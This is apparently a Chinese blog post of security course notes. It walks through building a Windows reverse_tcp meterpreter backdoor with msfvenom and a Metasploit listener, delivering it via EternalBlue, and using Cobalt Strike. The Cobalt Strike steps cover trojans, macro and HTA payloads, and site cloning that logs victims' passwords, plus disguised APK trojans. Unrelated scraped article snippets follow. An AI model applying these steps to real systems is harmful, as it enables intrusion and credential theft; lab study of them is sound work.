技术标签: 网络安全
我是dream,我在新课程培训学习网安方面的知识,下面是关于msf恶意程序利用以及CS的内容。
目录
后门的生成是为了更好的理解渗透过程中的方法以及途径,进而达到更好的防护,而不是利用技巧去做攻击等不合理的行为
思路就是利用社会工程学中人的心理,去为某系软件利用msf生成一些后门程序,进而通过带有后门的软件实现渗透获取shell
msfvenom是一个Metasploit独立的有效负载生成器,也是msfpayload和msfencode的替代品。是用来生成后门的软件
1、制作Windows恶意软件获取shell;
2、msfvenom的shell在Windows中的使用;
3、msfvenom生成shell.exe
-p 后面的 Windows/meterpreter/reverse_tcp 是在指定生成的有效载荷的类型。
LHOST后面的ip是攻击机的ip (注意攻击机和靶机的ip要在同一个网段上)
LPORT=6060 这里是指定连接的端口,尽量选择大一点的端口
-f 指输出的形式,这里指生成exe这种可执行文件
msf > use expliot/multi/handler 加载模块
msf exploit(multi/handler)> set payload windows/meterpreter/reverse_tcp 设置payload
msf expoit(multi/handler) > set lhost kali的ip 设置kali的ip
msf exploit(multi/handler) > exploit 或 run -j 运行
可通过永恒之蓝的漏洞上传
详情请看我的第二篇学习笔记——渗透测试
成功渗透之后,先用screenshot确定存储的路径
至于c:\\用两个,是因为这是转译(系统不同),对方收到后会丢失一个
然后用upload 加上刚才的路径,再加上刚才生成的exe文件,将这个文件传输到靶机的c盘里面。
ps:第一次上传失败是因为我没有在upload后面空格
第二次失败是我的上传路径不对。所以先用screenshot确定路径很必要。
一款以美国redteam团队研发出来的一款以Metasploit为基础的GUI框架式渗透测试工具
它是一款基于Java的渗透测试神器,常被业界人士称为CS,也被戏称为“线上多人运动平台”。
CS为啥被称为“线上多人运动平台”?
CS使用了C/S架构,它分为客户端和服务端,服务端只要一个,客户端可有多个,多人连接服务端后可协同测试,与其他人分享shell
C/S架构,服务器-客户机,即Client-Server(C/S)结构。C/S结构通常采取两层结构、服务器负责数据的管理,客户机负责完成与用户的交互任务。
当然连接别人的shell的前提,是知晓了对方的IP和密码。
Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、Java程序生成、office宏代码生成,包括站点克隆获取浏览器的相关信息等。
也可以在物理机上关闭防火墙和杀软,解压好了后复制粘贴到kali中。
cd cobalt_strike_4.5 首先进入CS的目录
ls 查看文件
chmod 777 * 使用chmod命令给所有的文件可读可写可执行权限(777表示可读可写可执行)
./teamserver kali的ip 连接密码
直接关闭防火墙,运行 cobaltstrike.bat这个文件
或者 在CS的目录下输入 ./cobaltstrike
在弹出来的窗口中,别名、主机、端口、用户都可以不修改,密码必须是第三部设置的密码,输入密码之后,点击连接.
会弹出一个“yes”“no”的弹窗,选择“yes”
就会出现下面这个弹窗
New Connection | 新建连接: | 支持连接多个服务器 |
Preferences | 偏好设置: | Cobalt Strike界面、控制台、以及输出报告样式、TeamServer连接记录 |
Visualization | 可视化: | 主要展示输出结果的视图 |
VPN Interfaces | VPN网卡: | 设置VPN |
Listenrs | 监听器: | 创建监听器(很重要) |
Script Manager | 脚本管理器: | 管理拓展的脚本 |
Close | 断开连接 | 字面意思 |
Applications (应用程序) | 显示受害主机的应用信息 | |
Credentials (密码凭证) | 显示所有已获取的受害主机的凭证,如hashdump、Mimikatz | |
Downloads (下载列表) | 查看已下载文件 | |
Event Log (事件日志) | 主机上线记录以及团队协作聊天记录 | |
Keystroke (键盘记录) | 查看键盘记录结果 | |
Proxy Pivots (代理转发) | 查看代理模块 | |
Screenshots (屏幕截图) | 查看所有屏幕截图 | |
Script Console(脚本控制台) | 加载第三方脚本以增强功能 | |
Targets (目标列表) | 显示所有受害主机 | |
Web Log (Web 日志) | 所有web服务的日志 |
HTML Application(HTA文档) | 生成一个恶意HTML Application木马,后缀格式为.hta。通过HTML调用其他语言的应用组件进行攻击,提供了可执行文件、PowerShell、VBA三种方法 |
MS Office Macro(Office宏) | 生成office宏病毒文件; |
Payload Generator(Payload生成器) | 生成各种语言版本的payload,可以生成基于C、C#、COM Scriptlet、Java、Perl、PowerShell、Python、VBA等的payload |
Windows Executable(Windows可执行程序) | 生成32位或64位的exe和基于服务的exe、DLL等后门程序 |
Windows Executable(S)(Windows可执行程序) | 用于生成一个exe可执行文件,其中包含Beacon的完成payload,不需要阶段性的请求。与Windows Executable模块相比,该模块额外提供了代理设置,以便在较为苛刻的环境中进行渗透测试。该模块还支持powershell脚本,可用于将Stageless Payload注入内存 |
Web Drive-byManage(站点管理) | 对开启的web服务进行管理 |
Clone Site(网站克隆) | 克隆网站,可以记录受害者提交的数据 |
Host File (文件托管) | 提供文件下载,可以选择Mime类型 |
Scripted Web Delivery (Web投递) | 为payload提供web服务以便下载和执行,类似于Metasploit的web_delivery |
Signed Applet Attack (签名Applet攻击) | 启动一个web服务以提供自签名Java Applet的运行环境 |
Smart Applet Attack (智能Applet攻击) | 自动检测Java版本并利用已知的exploit绕过security |
System Profiler (信息收集) | 用于获取系统信息,如系统版本,Flash版本,浏览器版本等 |
HTTP地址要填kali的ip地址,名字可以随便取,其他的可以保持不变。
点击保存后,就会显示“监听器已启动”。
克隆URL:选择要克隆的网址(一定要是http的网站,https不行)
下面的框框要勾选,做一个键盘监听,然后点击克隆。弹出窗口,复制克隆好的网址,再点ok。
然后就会出现一个跟被克隆的网站一样的页面,但是填入账号密码是不能登录的。
但是打开视图-web日志,会看到登录的信息。所以千万不要随意点开陌生链接,不要填写账号密码,不然账号和密码会被别人知道的。
这个操作真的太刑了。。。
选择刚才创建的监听器,再点击生成,就会出现右图,选择保存路径。
如果放到Windows,木马不见了,说明被防火墙杀掉了,记得添加信任区。
将生成的木马文件拖到靶机中,双击木马,CS就会显示上线!
此处可用永恒之蓝将木马上传到靶机中。
只要靶机运行这个文件,那么在CS视图-web日志中,就会显示出对方上线的信息。
右键,选择会话交互(相当于通过永恒之蓝渗透进入了,只不过速度会慢一点);或者回连间隔;抓取明文密码(没成功)等操作
可狱可囚,三思后行。
手机恶意应用程序:指在用户不完全知情和认可(它包括未经用户许可、强迫引导用户许可或隐瞒关键信息等)的情况下强行安装到用户手机中,或者一旦安装就无法正常卸载和删除,但又具备一定正常功能的软件程序。
它是介于病毒和正常软件之间的软件,它与病毒的区别是:一般还具备一定的正常功能。
根源载体——手机
恶意植入的木马程序可摘用户不知情的情况下,收集用户个人隐私信息、恶意扣费
PS:
1. 不要连接公共WiFi,因为连接好了之后,你和黑客处于同一个网段,黑客就可以攻击你的手机。
2. 去官网下载软件,不然可能下载到捆绑恶意应用程序(就像之前克隆的网站一样,肉眼分辨不出来)。
3. 不要贪小便宜,扫街边的二维码
很多APP由于存在大量安全漏洞和缺乏安全措施,被不法分子二次打包后,或被直接仿冒,或植入广告、恶意代码,甚至加入违法内容,重新投放应用市场,严重危害用户隐私与财产安全,网络“黑产”链条也开始滋生。
apk木马
名字可以随意取
1. 访问链接下载恶意应用(用短连接伪装,看不出来是木马)
2. 扫描二维码下载恶意应用
文章浏览阅读1.6k次。安装配置gi、安装数据库软件、dbca建库见下:http://blog.csdn.net/kadwf123/article/details/784299611、检查集群节点及状态:[root@rac2 ~]# olsnodes -srac1 Activerac2 Activerac3 Activerac4 Active[root@rac2 ~]_12c查看crs状态
文章浏览阅读1.3w次,点赞45次,收藏99次。我个人用的是anaconda3的一个python集成环境,自带jupyter notebook,但在我打开jupyter notebook界面后,却找不到对应的虚拟环境,原来是jupyter notebook只是通用于下载anaconda时自带的环境,其他环境要想使用必须手动下载一些库:1.首先进入到自己创建的虚拟环境(pytorch是虚拟环境的名字)activate pytorch2.在该环境下下载这个库conda install ipykernelconda install nb__jupyter没有pytorch环境
文章浏览阅读5.2k次,点赞19次,收藏28次。选择scoop纯属意外,也是无奈,因为电脑用户被锁了管理员权限,所有exe安装程序都无法安装,只可以用绿色软件,最后被我发现scoop,省去了到处下载XXX绿色版的烦恼,当然scoop里需要管理员权限的软件也跟我无缘了(譬如everything)。推荐添加dorado这个bucket镜像,里面很多中文软件,但是部分国外的软件下载地址在github,可能无法下载。以上两个是官方bucket的国内镜像,所有软件建议优先从这里下载。上面可以看到很多bucket以及软件数。如果官网登陆不了可以试一下以下方式。_scoop-cn
文章浏览阅读4.5k次,点赞2次,收藏3次。首先要有一个color-picker组件 <el-color-picker v-model="headcolor"></el-color-picker>在data里面data() { return {headcolor: ’ #278add ’ //这里可以选择一个默认的颜色} }然后在你想要改变颜色的地方用v-bind绑定就好了,例如:这里的:sty..._vue el-color-picker
文章浏览阅读640次。基于芯片日益增长的问题,所以内核开发者们引入了新的方法,就是在内核中只保留函数,而数据则不包含,由用户(应用程序员)自己把数据按照规定的格式编写,并放在约定的地方,为了不占用过多的内存,还要求数据以根精简的方式编写。boot启动时,传参给内核,告诉内核设备树文件和kernel的位置,内核启动时根据地址去找到设备树文件,再利用专用的编译器去反编译dtb文件,将dtb还原成数据结构,以供驱动的函数去调用。firmware是三星的一个固件的设备信息,因为找不到固件,所以内核启动不成功。_exynos 4412 刷机
文章浏览阅读2w次,点赞24次,收藏42次。Linux系统配置jdkLinux学习教程,Linux入门教程(超详细)_linux配置jdk
文章浏览阅读3.3k次,点赞5次,收藏19次。xlabel('\delta');ylabel('AUC');具体符号的对照表参照下图:_matlab微米怎么输入
文章浏览阅读119次。顺序读写指的是按照文件中数据的顺序进行读取或写入。对于文本文件,可以使用fgets、fputs、fscanf、fprintf等函数进行顺序读写。在C语言中,对文件的操作通常涉及文件的打开、读写以及关闭。文件的打开使用fopen函数,而关闭则使用fclose函数。在C语言中,可以使用fread和fwrite函数进行二进制读写。 Biaoge 于2024-03-09 23:51发布 阅读量:7 ️文章类型:【 C语言程序设计 】在C语言中,用于打开文件的函数是____,用于关闭文件的函数是____。
文章浏览阅读3.4k次,点赞2次,收藏13次。跟随鼠标移动的粒子以grid(SOP)为partical(SOP)的资源模板,调整后连接【Geo组合+point spirit(MAT)】,在连接【feedback组合】适当调整。影响粒子动态的节点【metaball(SOP)+force(SOP)】添加mouse in(CHOP)鼠标位置到metaball的坐标,实现鼠标影响。..._touchdesigner怎么让一个模型跟着鼠标移动
文章浏览阅读178次。项目运行环境配置:Jdk1.8 + Tomcat7.0 + Mysql + HBuilderX(Webstorm也行)+ Eclispe(IntelliJ IDEA,Eclispe,MyEclispe,Sts都支持)。项目技术:Springboot + mybatis + Maven +mysql5.7或8.0+html+css+js等等组成,B/S模式 + Maven管理等等。环境需要1.运行环境:最好是java jdk 1.8,我们在这个平台上运行的。其他版本理论上也可以。_基于java技术的停车场管理系统实现与设计
文章浏览阅读3.5k次。前言对于MediaPlayer播放器的源码分析内容相对来说比较多,会从Java-&amp;gt;Jni-&amp;gt;C/C++慢慢分析,后面会慢慢更新。另外,博客只作为自己学习记录的一种方式,对于其他的不过多的评论。MediaPlayerDemopublic class MainActivity extends AppCompatActivity implements SurfaceHolder.Cal..._android多媒体播放源码分析 时序图
文章浏览阅读2.4k次,点赞41次,收藏13次。java 数据结构与算法 ——快速排序法_快速排序法